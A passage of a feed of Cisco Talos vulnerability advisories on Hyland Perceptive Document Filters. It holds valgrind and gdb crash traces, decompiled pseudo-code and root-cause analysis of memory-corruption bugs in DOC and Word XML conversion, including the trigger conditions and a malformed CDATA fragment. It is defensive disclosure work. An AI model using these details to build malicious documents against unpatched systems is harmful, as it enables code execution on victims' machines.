0xA67F318: SkImageEncoder::encodeStream(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67F523: SkImageEncoder::EncodeStream(SkWStream*, SkBitmap const&, SkImageEncoder::Type, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0x9550EE2: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x955168B: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9565EFD: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== Address 0xada3ae0 is 0 bytes inside a block of size 112 free'd\n ==24951== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==24951== by 0x52A32C2: ISYS_NS::CTemporaryStream::~CTemporaryStream() (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSshared.so)\n ==24951== by 0x994BC10: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9955173: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x993A1EA: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3D345: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C35E7E: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x86C44A0: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== by 0x86C9196: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== by 0x4E3F87A: IGR_Open_Stream_Ex (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYS11df.so)\n ==24951== by 0x416BE6: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/isys_doc2text)\n ==24951== by 0x41EB99: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/isys_doc2text)\n ==24951== Block was alloc'd at\n ==24951== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==24951== by 0x993B782: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x993F7A0: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9943B6A: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9949E52: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x994B979: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9951A44: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C38AA4: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3B2C2: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3C3FB: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C35D75: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x86C44A0: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== \n pure virtual method called\n terminate called without an active exception\n ==24951== \n ==24951== Process terminating with default action of signal 6 (SIGABRT)\n ==24951== at 0x800C428: raise (raise.c:54)\n ==24951== by 0x800E029: abort (abort.c:89)\n ==24951== by 0x77C584C: __gnu_cxx::__verbose_terminate_handler() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C36B5: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C3700: std::terminate() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C423E: __cxa_pure_virtual (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0xA7F3DED: ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67697F: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA314735: png_write_sig (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA32420A: png_write_info_before_PLTE (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA324396: png_write_info (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA6776CD: SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n \n\n### Timeline\n\n2018-02-22 - Vendor Disclosure \n2018-03-22- Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0528\n\nPrevious Report\n\nTALOS-2018-0536\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3844"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0527", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0527", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:48", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0538\n\n## Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3855\n\n### Summary\n\nAn exploitable stack-based buffer overflow exists in the DOC-to-HTML conversion functionality of the Hyland Perceptive Document Filters version 11.4.0.2647. A crafted .doc document can lead to a stack-based buffer, resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux Perceptive Document Filters 11.2.0.1732 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-121: Stack-based Buffer Overflow\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion, which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats, such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a .doc document to HTML. A specially crafted .doc file can lead to a stack-based buffer overflow and remote code execution. Let\u2019s investigate this vulnerability. After we attempt to convert a malicious DOC using the Hyland library, we see the following state:\n \n \n icewall@ubuntu:$ ./isys_doc2text --html -o /tmp/a ./storage/2fa87ae8d1beba2b25940dca4088afde^C\n isys_doc2text 11.2.0.1732 Copyright (c) 1988-2015 Perceptive Software\n \n [00000000] File type: Text (UTF8) (74); Capabilities: 0001 - /tmp/a\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title></title>\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n </head>\n <body>\n <p>[1] File type: Microsoft Word (25); Capabilities: 15 - ./storage/2fa87ae8d1beba2b25940dca4088afde\n <br />\n </p>\n </body>\n </html>[00000000] Returned 201 characters\n [00000000] File type: Microsoft Word (25); Capabilities: 000f - ./storage/2fa87ae8d1beba2b25940dca4088afde\n \n Program received signal SIGSEGV, Segmentation fault.\n 0xf5603824 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n (rr) bt 10\n #0 0xf5603824 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n #1 0xffffffff in ?? ()\n #2 0xffffffff in ?? ()\n #3 0xffffffff in ?? ()\n #4 0xffffffff in ?? ()\n #5 0xffffffff in ?? ()\n #6 0xffffffff in ?? ()\n #7 0xffffffff in ?? ()\n #8 0xffffffff in ?? ()\n #9 0xffffffff in ?? ()\n (More stack frames follow...)\n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xffffffff \n EBX: 0xf5a86aec --> 0x99e30c \n ECX: 0xffffff01 \n EDX: 0xffffff01 \n ESI: 0x83 \n EDI: 0xff8f4790 --> 0xffffffff \n EBP: 0xff8f45c8 --> 0xffffffff \n ESP: 0xff8f45c0 --> 0xffffffff \n EIP: 0xf5603824 (:Office::IOfficeShape::updateNumbering(long*, long*, int*)+68>: 0x5f5e0889)\n EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf560381c <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+60>: jl 0xf5603810 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+48>\n 0xf560381e <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+62>: inc DWORD PTR [edi+ecx*4]\n 0xf5603821 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+65>: mov eax,DWORD PTR [ebp+0xc]\n => 0xf5603824 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+68>: mov DWORD PTR [eax],ecx\n 0xf5603826 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+70>: pop esi\n 0xf5603827 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+71>: pop edi\n 0xf5603828 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+72>: pop ebp\n 0xf5603829 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+73>: ret\n [------------------------------------stack-------------------------------------]\n 0000| 0xff8f45c0 --> 0xffffffff \n 0004| 0xff8f45c4 --> 0xffffffff \n 0008| 0xff8f45c8 --> 0xffffffff \n 0012| 0xff8f45cc --> 0xffffffff \n 0016| 0xff8f45d0 --> 0xffffffff \n 0020| 0xff8f45d4 --> 0xffffffff \n 0024| 0xff8f45d8 --> 0xffffffff \n 0028| 0xff8f45dc --> 0xffffffff \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n \n\nAs we can see, stack data has been completely overwritten by value `0xFFFFFFFF` inside the `intermediate::Office::IOfficeShape::updateNumbering` function. Showing this function in pseudo-code, it looks like this:\n \n \n Line 1 _DWORD __cdecl intermediate::Office::IOfficeShape::updateNumbering(intermediate::Office::IOfficeShape *this, int *maxIndex, int *minIndex, int *array)\n Line 2 {\n Line 3 int _minIndexValue; // ecx\n Line 4 int _maxnIndexValue; // edx\n Line 5 int *v6; // eax\n Line 6 int result; // eax\n Line 7 int *v8; // eax\n Line 8 int v9; // edx\n Line 9 \n Line 10 _minIndexValue = *minIndex;\n Line 11 if ( *minIndex <= 10 )\n Line 12 {\n Line 13 if ( _minIndexValue == -1 )\n Line 14 {\n Line 15 _minIndexValue = 0;\n Line 16 *minIndex = 0;\n Line 17 }\n Line 18 }\n Line 19 else\n Line 20 {\n Line 21 _minIndexValue = 10;\n Line 22 *minIndex = 10;\n Line 23 }\n Line 24 _maxnIndexValue = *maxIndex;\n Line 25 if ( _minIndexValue < *maxIndex )\n Line 26 {\n Line 27 if ( _maxnIndexValue != -1 )\n Line 28 {\n Line 29 v6 = &array[_maxnIndexValue];\n Line 30 do\n Line 31 {\n Line 32 *v6 = -1;\n Line 33 --_maxnIndexValue;\n Line 34 --v6;\n Line 35 }\n Line 36 while ( _minIndexValue < _maxnIndexValue );\n Line 37 }\n Line 38 goto LABEL_7;\n Line 39 }\n Line 40 \n Line 41 (...)\n \n\nThe values of significant arguments are equal:\n \n \n int minIndex = 0xffffff01 (-255) \n int maxIndex = 0x0\n \n\nWith the arguments having the above mentioned values, we pass both checks at lines `25` and `27` and later assign a pointer to the first element of the `array` table to the `v6` variable. Inside the loop at `lines 30-36` just after the first iteration, the `v6` pointer will be set to an address before the beginning of `array`, causing an out-of-bounds write at `line 32`, and will result in corruption of stack values.\n\nThe loop for the following parameters will be executed 255 times. The vulnerability exists because the check at `line 13` is not sufficient, and does not consider values under zero other than -1. The vulnerability would not occur if the check at `line 24` would be done for `unsigned integers`.\n\nTracking where the value of `minIndex` was set we land in the following place :\n \n \n const intermediate::common::ITextStyle *__cdecl intermediate::odf::TextParagraphProperties::TextParagraphProperties\n (...)\n mov DWORD PTR [eax+0x64],0xffffff01\n \n\nSo `-255` value of `minIndex` (according of some getter function name it is exactly `NumberingLevel`) is a default value set inside the \"Text Paragraph Properties\" constructor. Further investigation showed that this default value is only overwritten if a particular paragraph has corresponding `PAPX` (Paragraph Property Exceptions) record, which contains `sprm` (Property Modifier) having a value of `0x260a`. That `sprm` according to the `MS-DOC` format specification is `sprmPIlvl`. Also, looking at the call stack before the corruption:\n \n \n gdb-peda$ bt\n #0 0xf56037e5 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n #1 0xf5633bbe in intermediate::Office::Shape2003::addTextContentUnit(intermediate::Office::IOfficeTextItem*, intermediate::common::ITextContentUnit*, intermediate::common::ITextNumberingTable*, long*, int*) () from ./libISYSreadershd.so\n #2 0xf566ab76 in intermediate::odf::TextDocumentContent::createParagraph(std::vector<intermediate::common::ITextContentUnit*, std::allocator<intermediate::common::ITextContentUnit*> >&, int, int, bool, int, bool) () from ./libISYSreadershd.so\n #3 0xf566ba72 in intermediate::odf::TextDocumentContent::createParagraph(std::vector<intermediate::common::ITextContentUnit*, std::allocator<intermediate::common::ITextContentUnit*> >&, int, int, bool) () from ./libISYSreadershd.so\n #4 0xf566e1ed in intermediate::odf::TextDocumentContent::TextDocumentContent(reader::word97_2003::Document const&, intermediate::odf::TextDocumentPackages*, intermediate::odf::TextNumberingTable*) () from ./libISYSreadershd.so\n #5 0xf568b49d in intermediate::odf::TextDocumentPackagesImpl::Init(reader::word97_2003::Document const&, intermediate::odf::TextDocumentPackages*) () from ./libISYSreadershd.so\n #6 0xf568c047 in intermediate::odf::TextDocumentPackages::TextDocumentPackages(std::auto_ptr<reader::word97_2003::Document>) () from ./libISYSreadershd.so\n #7 0xf575cdf4 in ISYS_NS::LibraryHD::CDocument::openWord(IStorage*) () from ./libISYSreadershd.so\n #8 0xf575dfea in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #9 0xf57594d9 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #10 0xf623f6d1 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #11 0xf624513c in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #12 0xf5f4b673 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #13 0x08050654 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #14 0x08054574 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #15 0x080581f9 in main ()\n #16 0xf5bbe637 in __libc_start_main (main=0x8057b90 <main>, argc=0x5, argv=0xff8fbc34, init=0x8069890 <__libc_csu_init>, fini=0x8069880 <__libc_csu_fini>, rtld_fini=0xf7fd2880 <_dl_fini>, stack_end=0xff8fbc2c) at ../csu/libc-start.c:291\n #17 0x0804d6e1 in _start ()\n \n\nWe can deduce that the paragraph is inside a shape object, and that is one of the crucial requirements to trigger the vulnerability. An attacker who provides a malicious .doc document for conversion to HTML could trigger this vulnerability, and potentially gain code execution on the system.\n\n### Crash Information\n \n \n Starting program: /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text --html -o /tmp/a ./storage/2fa87ae8d1beba2b25940dca4088afde\n [Thread debugging using libthread_db enabled]\n Using host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n [1] File type: Microsoft Word (25); Capabilities: 15 - ./storage/2fa87ae8d1beba2b25940dca4088afde\n \n Program received signal SIGSEGV, Segmentation fault.\n 0xf516d174 in ?? () from ./libISYSreadershd.so\n (gdb) bt 10\n #0 0xf516d174 in ?? () from ./libISYSreadershd.so\n #1 0xffffffff in ?? ()\n #2 0xffffffff in ?? ()\n #3 0xffffffff in ?? ()\n #4 0xffffffff in ?? ()\n #5 0xffffffff in ?? ()\n #6 0xffffffff in ?? ()\n #7 0xffffffff in ?? ()\n #8 0xffffffff in ?? ()\n #9 0xffffffff in ?? ()\n (More stack frames follow...)\n \n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xffffffff \n EBX: 0xf56b4f0c --> 0xa42fcc \n ECX: 0xffffff01 \n EDX: 0xffffff01 \n ESI: 0xa3 \n EDI: 0xffffade0 --> 0xffffffff \n EBP: 0xffffaa98 --> 0xffffffff \n ESP: 0xffffaa90 --> 0xffffffff \n EIP: 0xf516d174 (mov DWORD PTR [eax],ecx)\n EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf516d16c: jl 0xf516d160\n 0xf516d16e: inc DWORD PTR [edi+ecx*4]\n 0xf516d171: mov eax,DWORD PTR [ebp+0xc]\n => 0xf516d174: mov DWORD PTR [eax],ecx\n 0xf516d176: pop esi\n 0xf516d177: pop edi\n 0xf516d178: pop ebp\n 0xf516d179: ret\n [------------------------------------stack-------------------------------------]\n 0000| 0xffffaa90 --> 0xffffffff \n 0004| 0xffffaa94 --> 0xffffffff \n 0008| 0xffffaa98 --> 0xffffffff \n 0012| 0xffffaa9c --> 0xffffffff \n 0016| 0xffffaaa0 --> 0xffffffff \n 0020| 0xffffaaa4 --> 0xffffffff \n 0024| 0xffffaaa8 --> 0xffffffff \n 0028| 0xffffaaac --> 0xffffffff \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n \n\n### Timeline\n\n2018-03-16 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin \"Icewall\" Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Previous Report\n\nTALOS-2018-0534\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3855"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0538", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0538", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:44", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0534\n\n## Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3851\n\n### Summary\n\nAn exploitable heap corruption exists in the Microsoft Word to many types conversion functionality of the Hyland Perspective Document Filters version 11.4.0.2647. A crafted Microsoft Word (XML) document can lead to heap corruption resulting in remote code execution. An attacker can provide a specially crafted file to trigger this vulnerability.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-787: Out-of-bounds Write\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a Microsoft Word (XML) to JPEG, HTML5 and several other formats. A specially crafted Microsoft Word (XML) file can lead to heap corruption and remote code execution. Let\u2019s investigate this vulnerability:\n\nAfter we attempt to convert a malicious Microsoft Word (xml) using the Hyland library we see the following state:\n \n \n isys_doc2text --html5 -o /tmp malformed_doc.xml\n [1] File type: Microsoft Word (25); Capabilities: 3 - malformed_doc.xml\n \n Program received signal SIGSEGV, Segmentation fault.\n __memcpy_sse2_unaligned () at ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S:628\n 628 ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S: No such file or directory.\n (rr) bt\n #0 __memcpy_sse2_unaligned () at ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S:628\n #1 0xf6028fef in ISYS_NS::CMemoryStream::Write(void const*, unsigned int) () from ./libISYSshared.so\n #2 0xf5fe3c75 in ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #3 0xf5fe392f in ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #4 0xf5fe392f in ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #5 0xf5fdf815 in ISYS_NS::XML::XMLNode::xml(std::string&) () from ./libISYSshared.so\n #6 0xf614ae9e in ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) () from ./libISYSshared.so\n #7 0xf61414c0 in ISYS_NS::CMSWord2003XML::needFileList() () from ./libISYSshared.so\n #8 0xf61416a9 in ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) () from ./libISYSshared.so\n #9 0xf4aa8ecc in ?? () from ./libISYSreadershd.so\n #10 0xf4aa9ef5 in ?? () from ./libISYSreadershd.so\n #11 0xf4c3920f in ?? () from ./libISYSreadershd.so\n #12 0xf4e7a5d5 in ?? () from ./libISYSreadershd.so\n #13 0xf515b6e8 in ?? () from ./libISYSreadershd.so\n #14 0xf5163492 in ?? () from ./libISYSreadershd.so\n #15 0xf58eeeb3 in ?? () from ./libISYSreaders.so\n #16 0xf58f455d in ?? () from ./libISYSreaders.so\n #17 0xf7ebc5e3 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #18 0x080590eb in ?? ()\n #19 0x08061690 in ?? ()\n #20 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #21 0xf60f873d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #22 0xf6104ff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #23 0xf6101524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #24 0x08054e88 in ?? ()\n #25 0xf5a72637 in __libc_start_main (main=0x8054d40, argc=5, argv=0xffb76ed4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f04880 <_dl_fini>, stack_end=0xffb76ecc) at ../csu/libc-start.c:291\n #26 0x080531b1 in ?? ()\n \n \n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xfff9de36 \n EBX: 0x98b7000 \n ECX: 0x9877500 (\".microsoft.com/aml/2001/core\\\" xml:space=\\\"preserve\\\">\\n\\t<w:body>\\n\\t\\t<w:tc>\\n\\t\\t\\t<w:t><![CDATA[]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n EDX: 0x9877558 (\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n ESI: 0xffb747e4 --> 0xf7e9bda8 (:CMemoryStream+8>: 0xf602a180)\n EDI: 0xffffffff \n EBP: 0xffb745d8 --> 0xffb74678 --> 0xffb74718 --> 0xffb747b8 --> 0xffb74818 --> 0xffb748a8 (--> ...)\n ESP: 0xffb745a8 --> 0xf7ea834c --> 0x205a0e0 \n EIP: 0xf5b80fff --> 0x3e70f66\n EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf5b80fed <__memcpy_sse2_unaligned+621>: movdqu xmm5,XMMWORD PTR [ebx+eax*1+0x50]\n 0xf5b80ff3 <__memcpy_sse2_unaligned+627>: movdqu xmm6,XMMWORD PTR [ebx+eax*1+0x60]\n 0xf5b80ff9 <__memcpy_sse2_unaligned+633>: movdqu xmm7,XMMWORD PTR [ebx+eax*1+0x70]\n => 0xf5b80fff <__memcpy_sse2_unaligned+639>: movntdq XMMWORD PTR [ebx],xmm0\n 0xf5b81003 <__memcpy_sse2_unaligned+643>: movntdq XMMWORD PTR [ebx+0x10],xmm1\n 0xf5b81008 <__memcpy_sse2_unaligned+648>: movntdq XMMWORD PTR [ebx+0x20],xmm2\n 0xf5b8100d <__memcpy_sse2_unaligned+653>: movntdq XMMWORD PTR [ebx+0x30],xmm3\n 0xf5b81012 <__memcpy_sse2_unaligned+658>: movntdq XMMWORD PTR [ebx+0x40],xmm4\n [------------------------------------stack-------------------------------------]\n 0000| 0xffb745a8 --> 0xf7ea834c --> 0x205a0e0 \n 0004| 0xffb745ac --> 0xf6028fef (:CMemoryStream::Write(void const*, unsigned int)+63>: 0x89f0458b)\n 0008| 0xffb745b0 --> 0x9877558 (\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n 0012| 0xffb745b4 --> 0x981538e (\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n 0016| 0xffb745b8 --> 0xffffffff \n 0020| 0xffb745bc --> 0xffb74620 --> 0xf5df806c (:string::_Rep::_S_empty_rep_storage+12>: 0x00000000)\n 0024| 0xffb745c0 --> 0xf63b9287 (\"<![CDATA[\")\n 0028| 0xffb745c4 --> 0xf63b9290 --> 0x3e5d5d00 ('')\n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n gdb-peda$ \n \n\nAs we can see, an out of bounds write appeared during a `memcpy` operation causing access violation. Stepping back we see that the `memcpy` function was called with the following parameters:\n \n \n [-------------------------------------code-------------------------------------]\n 0xf6028fe5 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+53>: mov edx,DWORD PTR [ebp+0xc]\n 0xf6028fe8 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+56>: push edx\n 0xf6028fe9 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+57>: push eax\n => 0xf6028fea <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+58>: call 0xf5fc77ec <memcpy@plt>\n 0xf6028fef <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+63>: mov eax,DWORD PTR [ebp-0x10]\n 0xf6028ff2 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+66>: mov DWORD PTR [esi+0xc],eax\n 0xf6028ff5 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+69>: add esp,0x10\n 0xf6028ff8 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+72>: mov eax,edi\n Guessed arguments:\n arg[0]: 0x9877558 (\"\"...)\n arg[1]: 0x981538e (\"]]>...\")\n arg[2]: 0xffffffff \n \n\nSo the `size` parameter is set to 0xffffffff ( `-1` ) which explains why the `memcpy` operation ended up with an access violation. Why does the `size` parameter have that value? Tracking code execution back, we end up in the place where it is calculated:\n \n \n Line 1 ISYS_NS::XML::CXMLDocumentImpl *__cdecl ISYS_NS::XML::CXMLDocumentImpl::load(ISYS_NS::XML::CXMLDocumentImpl *this)\n Line 2 {\n Line 3 (...)\n Line 4 if ( *CDATAElement != '!' )\n Line 5 goto LABEL_17;\n Line 6 v2 = CDATAElement + 1;\n Line 7 v9 = CDATAElement[1];\n Line 8 if ( v9 == '[' )\n Line 9 {\n Line 10 if ( 